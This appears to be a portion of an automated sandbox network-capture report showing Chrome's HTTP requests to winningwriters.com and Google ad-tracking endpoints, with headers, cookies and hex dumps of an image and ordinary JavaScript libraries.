                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:09 UTC732OUTGET /assets/images/logo@2x.png HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646
                                                                                                                                                                                            2024-11-18 20:00:09 UTC370INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:09 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 24 Oct 2018 18:10:41 GMT
                                                                                                                                                                                            ETag: "7263-578fd676fea40"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 29283
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:09 GMT
                                                                                                                                                                                            Vary: User-Agent,Accept-Encoding
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            2024-11-18 20:00:09 UTC7822INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 44 00 00 01 0c 08 03 00 00 00 12 dd 59 f4 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 68 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 33 2d 63 30 31 31 20 36 36 2e 31 34 35 36 36 31 2c 20 32 30 31 32 2f 30 32 2f 30 36 2d 31 34 3a 35 36 3a 32 37 20 20
                                                                                                                                                                                            Data Ascii: PNGIHDRDYtEXtSoftwareAdobe ImageReadyqe<hiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: bd bf 5e b1 66 77 1b 3f f4 cf 32 a5 7d 84 fc 4c a5 e2 0c a9 94 08 e4 8b 63 62 26 8e f3 20 09 a0 20 05 f0 c5 4f 10 65 12 ee 79 a4 1a f5 76 30 9f d9 55 82 ed 15 8b 54 a0 ff 14 b5 d5 8d d3 40 b1 1c a0 80 90 38 2e 46 63 46 dd e9 b6 0a 17 52 4b 60 11 6b 23 a3 f8 3a 01 77 c4 9a 69 b2 14 0e de 30 45 69 b7 ff de eb 45 fb 65 80 ef c0 d0 4a bb f5 2a 31 6f f9 67 11 df d9 bf eb e7 a9 87 d0 3f 0d 91 13 94 f0 09 95 d5 26 27 31 ba 63 00 95 75 d1 02 b2 92 ae b1 1a 77 c9 45 7e 26 3e 36 62 79 06 c9 dd 7b ce 55 36 7d 6e f4 7c 44 04 09 a0 01 fc 76 bc 4d 8d fa e5 85 55 48 25 c2 64 73 d8 db 29 24 50 21 10 c6 a9 cc 64 e7 85 1f 9e a1 ff d8 b4 c7 5d 5e 2f fa ee a5 f3 5e 8f 78 fd ed 17 5e f6 bd fa cb 47 fb 6f f6 eb b5 e7 99 27 be fe 59 42 34 3c eb ae ee e8 88 92 24 57 74 d0 68 94
                                                                                                                                                                                            Data Ascii: ^fw?2}Lcb& Oeyv0UT@8.FcFRK`k#:wi0EiEeJ*1og?&'1cuwE~&>6by{U6}n|DvMUH%ds)$P!d]^/^x^Go'YB4<$Wth
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: 74 a2 d0 5d 34 58 58 5d e2 19 ac 41 3d a2 c2 fa c6 12 57 39 56 ee 51 54 54 e9 c2 82 ff 92 0a 4f 2f 42 60 09 78 62 15 ac e2 a6 72 f9 50 6a 7a b6 c0 a6 40 21 d2 73 65 3b a5 52 8d 29 de 60 b1 f1 f4 7a 9b 88 7a 40 49 ba c6 38 30 0e 28 a0 9d 02 f5 0f bc fb e7 0f b5 67 ff 2d fb d3 0e 07 68 de 65 bc c6 94 c7 0d 25 5b 1e 5e 58 74 ed 65 e9 18 b6 53 89 d1 a8 bd f7 a9 25 99 ca e3 8e 6c e7 d9 ca 29 a4 ac 16 a9 45 3c 15 42 fe 40 ff 09 1c bd b2 f1 44 2f 93 5e 59 57 53 54 72 a2 61 a8 a4 af a2 d6 53 5d e1 76 23 15 48 75 ad bb c2 e3 99 ea 29 aa a8 27 e0 b6 cf e1 93 40 80 9e c0 01 75 19 99 76 18 8a 8e a6 4b e4 49 72 21 a4 49 97 c0 6a 9b 49 63 b1 e7 a3 01 1a 35 ea 1a 77 e9 a6 28 64 02 bc d4 12 5b 74 23 42 f4 f5 f3 87 03 f9 0b 5f 3f b6 6e 9e 07 b3 67 cb 1b af 7b 35 11 fa 57
                                                                                                                                                                                            Data Ascii: t]4XX]A=W9VQTTO/B`xbrPjz@!se;R)`zz@I80(g-he%[^XteS%l)E<B@D/^YWSTraS]v#Hu)'@uvKIr!IjIc5w(d[t#B_?ng{5W
                                                                                                                                                                                            2024-11-18 20:00:09 UTC5461INData Raw: 33 5d 37 1b d6 58 76 c6 ab 6c 71 c5 6e f2 90 ba f1 67 a4 16 f2 cb 12 bb 39 f8 67 a3 23 c1 91 f9 7d 10 91 26 aa b4 f0 34 9e b7 9b 6d 41 a3 0e a9 34 75 79 af fc 8e 2d b0 d9 e9 00 5c 3b e7 f3 ce 04 2f 38 fc 7c 59 2d e4 b4 59 c0 7a ad b5 b3 ab cb e3 71 bb ad 2c 03 22 8c 3a 05 6a b7 96 cc 3e 0f 4f c0 3f a2 14 5c b1 f1 b5 46 8d d5 eb 71 d6 cb 95 b1 0f 4f 12 44 c4 22 47 e6 36 e9 40 1b 7a 55 72 4b 39 7c e3 ab f3 70 22 63 91 21 b4 7a 8e 1f c5 d6 2d 48 17 1c bd 5e bc 00 aa 2d 4f c4 9e 64 9c 32 5c 9d f2 89 1a 83 a7 08 15 3a dd a2 34 db 38 84 1b 69 aa d9 89 6b d9 20 bc ee ee a6 f6 64 1f ef 18 9a 74 0f 59 64 28 06 aa 6a 19 cc 39 da 57 0a 57 09 39 5d 90 5c 6e 32 7a 2d 90 c3 e4 f2 3a bb 9c 6a 8f 81 55 d4 c0 35 bb 93 db cb fa 57 25 18 8b 7e ff 4c 03 22 ac 5c 2e 8f 01 aa
                                                                                                                                                                                            Data Ascii: 3]7Xvlqng9g#}&4mA4uy-\;/8|Y-Yzq,":j>O?\FqOD"G6@zUrK9|p"c!z-H^-Od2\:48ik dtYd(j9WW9]\n2z-:jU5W%~L"\.


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            65192.168.2.164979666.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:09 UTC909OUTGET /assets/js/device.min.js HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646
                                                                                                                                                                                            2024-11-18 20:00:09 UTC365INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:09 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 13 Nov 2024 13:06:38 GMT
                                                                                                                                                                                            ETag: "adb-626cb010b5380"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 2779
                                                                                                                                                                                            Cache-Control: max-age=10800
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:09 GMT
                                                                                                                                                                                            Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                            Content-Type: text/javascript
                                                                                                                                                                                            2024-11-18 20:00:09 UTC2779INData Raw: 2f 2a 21 20 64 65 76 69 63 65 2e 6a 73 20 30 2e 31 2e 35 38 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 2c 69 2c 6a 3b 61 3d 77 69 6e 64 6f 77 2e 64 65 76 69 63 65 2c 77 69 6e 64 6f 77 2e 64 65 76 69 63 65 3d 7b 7d 2c 63 3d 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 6a 3d 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 64 65 76 69 63 65 2e 69 6f 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 65 76 69 63 65 2e 69 70 68 6f 6e 65 28 29 7c 7c 64 65 76 69 63 65 2e 69 70 6f 64 28 29 7c 7c 64 65 76 69 63 65 2e 69 70 61 64 28 29 7d 2c 64 65 76 69 63 65 2e 69 70
                                                                                                                                                                                            Data Ascii: /*! device.js 0.1.58 */(function(){var a,b,c,d,e,f,g,h,i,j;a=window.device,window.device={},c=window.document.documentElement,j=window.navigator.userAgent.toLowerCase(),device.ios=function(){return device.iphone()||device.ipod()||device.ipad()},device.ip


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            66192.168.2.1649790142.250.185.1944436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:09 UTC1108OUTGET /pagead/viewthroughconversion/1072733940/?random=1731960006858&cv=11&fst=1731960006858&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4 HTTP/1.1
                                                                                                                                                                                            Host: googleads.g.doubleclick.net
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: test_cookie=CheckForPermission
                                                                                                                                                                                            2024-11-18 20:00:09 UTC1011INHTTP/1.1 200 OK
                                                                                                                                                                                            P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:09 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                            Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                            Server: cafe
                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                            Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; expires=Fri, 01-Aug-2008 22:45:55 GMT; SameSite=none; Secure
                                                                                                                                                                                            Set-Cookie: IDE=AHWqTUmU9BrGmowYeEAFj63Amj7wo1xzgFQYDE60tcJ3OfQMbNLJMYVdUCk56ely; expires=Wed, 18-Nov-2026 20:00:09 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            2024-11-18 20:00:09 UTC367INData Raw: 31 32 61 63 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 73 20 3d 20 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 29 7b 69 66 28 61 3d 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 61 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 61 3b 61 5b 62 5d 3d 64 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 66 75 6e 63 74 69 6f 6e 20 6b 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c
                                                                                                                                                                                            Data Ascii: 12ac(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&global
                                                                                                                                                                                            2024-11-18 20:00:09 UTC1378INData Raw: 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 64 3d 61 5b 62 5d 3b 69 66 28 64 26 26 64 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 64 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 67 6c 6f 62 61 6c 20 6f 62 6a 65 63 74 22 29 3b 7d 20 76 61 72 20 6d 3d 6b 28 74 68 69 73 29 2c 70 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 28 22 78 22 29 3d 3d 3d 22 73 79 6d 62 6f 6c 22 2c 74 3d 7b 7d 2c 76 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 77 28 61 2c 62 2c 64 29 7b 69 66 28 21 64 7c 7c 61 21 3d 6e 75 6c 6c 29 7b 64 3d 76 5b 62 5d 3b 69 66 28 64 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 20 61 5b 62 5d 3b 64 3d 61 5b 64 5d 3b 72 65
                                                                                                                                                                                            Data Ascii: b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];re
                                                                                                                                                                                            2024-11-18 20:00:09 UTC1378INData Raw: 69 66 28 4c 3d 4c 5b 4b 5b 4d 5d 5d 2c 4c 3d 3d 6e 75 6c 6c 29 7b 48 3d 6e 75 6c 6c 3b 62 72 65 61 6b 20 61 7d 48 3d 4c 7d 76 61 72 20 4e 3d 48 26 26 48 5b 36 31 30 34 30 31 33 30 31 5d 3b 47 3d 4e 21 3d 6e 75 6c 6c 3f 4e 3a 21 31 3b 76 61 72 20 4f 2c 50 3d 7a 2e 6e 61 76 69 67 61 74 6f 72 3b 4f 3d 50 3f 50 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 7c 7c 6e 75 6c 6c 3a 6e 75 6c 6c 3b 66 75 6e 63 74 69 6f 6e 20 51 28 61 29 7b 72 65 74 75 72 6e 20 47 3f 4f 3f 4f 2e 62 72 61 6e 64 73 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 28 62 3d 62 2e 62 72 61 6e 64 29 26 26 62 2e 69 6e 64 65 78 4f 66 28 61 29 21 3d 2d 31 7d 29 3a 21 31 3a 21 31 7d 66 75 6e 63 74 69 6f 6e 20 52 28 61 29 7b 76 61 72 20 62 3b 61 3a 7b 69 66 28 62 3d 7a 2e 6e
                                                                                                                                                                                            Data Ascii: if(L=L[K[M]],L==null){H=null;break a}H=L}var N=H&&H[610401301];G=N!=null?N:!1;var O,P=z.navigator;O=P?P.userAgentData||null:null;function Q(a){return G?O?O.brands.some(function(b){return(b=b.brand)&&b.indexOf(a)!=-1}):!1:!1}function R(a){var b;a:{if(b=z.n
                                                                                                                                                                                            2024-11-18 20:00:09 UTC1378INData Raw: 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 7b 76 61 72 20 49 3d 77 28 4f 62 6a 65 63 74 2c 22 61 73 73 69 67 6e 22 29 2e 63 61 6c 6c 28 4f 62 6a 65 63 74 2c 7b 7d 2c 45 29 3b 6e 26 26 28 6e 2e 61 74 74 72 69 62 75 74 69 6f 6e 52 65 70 6f 72 74 69 6e 67 26 26 20 28 49 2e 61 74 74 72 69 62 75 74 69 6f 6e 52 65 70 6f 72 74 69 6e 67 3d 6e 2e 61 74 74 72 69 62 75 74 69 6f 6e 52 65 70 6f 72 74 69 6e 67 29 2c 6e 2e 62 72 6f 77 73 69 6e 67 54 6f 70 69 63 73 26 26 28 49 2e 62 72 6f 77 73 69 6e 67 54 6f 70 69 63 73 3d 6e 2e 62 72 6f 77 73 69 6e 67 54 6f 70 69 63 73 29 29 3b 74 72 79 7b 76 61 72 20 53 3d 43 2e 66 65 74 63 68 28 71 2c 49 29 3b 53 26 26 53 2e 63 61 74 63 68 28 42 29 3b 76 61 72 20 4a 3d 21 30 3b 62 72 65 61 6b 20 61 7d 63 61 74 63 68 28 62 61 29 7b 7d
                                                                                                                                                                                            Data Ascii: ==="function"){var I=w(Object,"assign").call(Object,{},E);n&&(n.attributionReporting&& (I.attributionReporting=n.attributionReporting),n.browsingTopics&&(I.browsingTopics=n.browsingTopics));try{var S=C.fetch(q,I);S&&S.catch(B);var J=!0;break a}catch(ba){}
                                                                                                                                                                                            2024-11-18 20:00:09 UTC287INData Raw: 78 33 64 30 5c 78 32 36 75 61 6d 5c 78 33 64 5c 78 32 36 75 61 70 5c 78 33 64 57 69 6e 64 6f 77 73 5c 78 32 36 75 61 70 76 5c 78 33 64 31 30 2e 30 2e 30 5c 78 32 36 75 61 77 5c 78 33 64 30 5c 78 32 36 66 6c 65 64 67 65 5c 78 33 64 31 5c 78 32 36 64 61 74 61 5c 78 33 64 65 76 65 6e 74 25 33 44 67 74 61 67 2e 63 6f 6e 66 69 67 5c 78 32 36 72 66 6d 74 5c 78 33 64 33 5c 78 32 36 66 6d 74 5c 78 33 64 33 5c 78 32 36 69 73 5f 76 74 63 5c 78 33 64 31 5c 78 32 36 63 69 64 5c 78 33 64 43 41 51 53 4b 51 43 61 37 4c 37 64 37 62 7a 51 6f 74 64 38 70 6d 45 64 6e 41 45 6b 4c 56 6b 51 50 68 31 50 76 58 58 30 41 5a 55 43 51 71 44 4d 43 5a 75 74 5a 6a 6f 5a 79 75 68 39 5c 78 32 36 72 61 6e 64 6f 6d 5c 78 33 64 31 31 36 35 38 30 35 34 30 39 5c 78 32 36 72 6d 74 5f 74 6c 64
                                                                                                                                                                                            Data Ascii: x3d0\x26uam\x3d\x26uap\x3dWindows\x26uapv\x3d10.0.0\x26uaw\x3d0\x26fledge\x3d1\x26data\x3devent%3Dgtag.config\x26rfmt\x3d3\x26fmt\x3d3\x26is_vtc\x3d1\x26cid\x3dCAQSKQCa7L7d7bzQotd8pmEdnAEkLVkQPh1PvXX0AZUCQqDMCZutZjoZyuh9\x26random\x3d1165805409\x26rmt_tld
                                                                                                                                                                                            2024-11-18 20:00:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            67192.168.2.1649789142.250.185.1644436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:09 UTC1374OUTGET /pagead/1p-user-list/1072733940/?random=1731960006858&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=3&is_vtc=1&cid=CAQSGwCa7L7d8_tahwouFkWEMPhMGqs141QoAhXnsQ&random=2808805193&rmt_tld=0&ipr=y HTTP/1.1
                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:09 UTC602INHTTP/1.1 200 OK
                                                                                                                                                                                            P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:09 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                            Content-Type: image/gif
                                                                                                                                                                                            Content-Security-Policy: script-src 'none'; object-src 'none'
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            Server: cafe
                                                                                                                                                                                            Content-Length: 42
                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            2024-11-18 20:00:09 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                            Data Ascii: GIF89a!,D;


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            68192.168.2.164979866.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:09 UTC912OUTGET /assets/js/jquery.cookie.js HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646
                                                                                                                                                                                            2024-11-18 20:00:09 UTC365INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:09 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 13 Nov 2024 13:06:38 GMT
